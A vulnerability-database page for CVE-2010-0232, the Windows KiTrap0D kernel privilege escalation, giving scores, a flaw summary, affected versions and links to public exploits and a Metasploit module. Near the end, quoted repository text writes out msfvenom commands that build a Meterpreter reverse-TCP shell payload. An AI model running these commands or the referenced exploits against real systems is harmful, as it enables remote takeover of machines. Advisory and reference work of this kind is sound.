7.2
CVSSv2

CVE-2010-0232

Published: 21/01/2010 Updated: 07/12/2023
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 726
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The kernel in Microsoft Windows NT 3.1 through Windows 7, including Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges by crafting a VDM_TIB data structure in the Thread Environment Block (TEB), and then calling the NtVdmControl function to start the Windows Virtual DOS Machine (aka NTVDM) subsystem, leading to improperly handled exceptions involving the #GP trap handler (nt!KiTrap0D), aka "Windows Kernel Exception Handler Vulnerability."

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft windows nt 3.1

microsoft windows server 2008 -

microsoft windows xp -

microsoft windows server 2008 sp2

microsoft windows vista

microsoft windows 7 -

microsoft windows server 2008

microsoft windows 2000 sp4

microsoft windows xp sp3

microsoft windows server 2003

microsoft windows vista sp1

microsoft windows vista sp2

Exploits

Exploit-DB Mirror: githubcom/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11199zip (KiTrap0Dzip) E-DB Note: Make sure to run "vdmallowedexe" (pre-compiled) inside the subfolder Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack ---------------------------------------------------------------- ...
This Metasploit module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy If the session in use is already elevated then the exploit will not run The module relies on kitrap0dx86dll and is not supported on x64 editions of Windows ...
VMware suffers from a backdoor ROM overwrite privilege escalation vulnerability ...
Microsoft Windows suffers from an user mode to ring 0 escalation vulnerability ...

Github Repositories

Development of an exploit for privilege escalation in Windows systems ( NT / 2k / XP / 2K3 / VISTA / 2k8 / 7 ) using the vulnerability CVE-2010-0232

CVE-2010-0232 Development of an exploit for privilege escalation in Windows systems ( NT / 2k / XP / 2K3 / VISTA / 2k8 / 7 ) using the vulnerability CVE-2010-0232 This is an educational project I took up to learn the gruesome details of lowlevel kernel exploits, This is my first such exploit I'm learning by coding along with reading the exploit code and explnation writte

Meterpreter-msfvenom 1Msfvenom - generating shellcode Binaries Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language> OR msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf >

Meterpreter-msfvenom 1Msfvenom - generating shellcode Binaries Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language> OR msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf >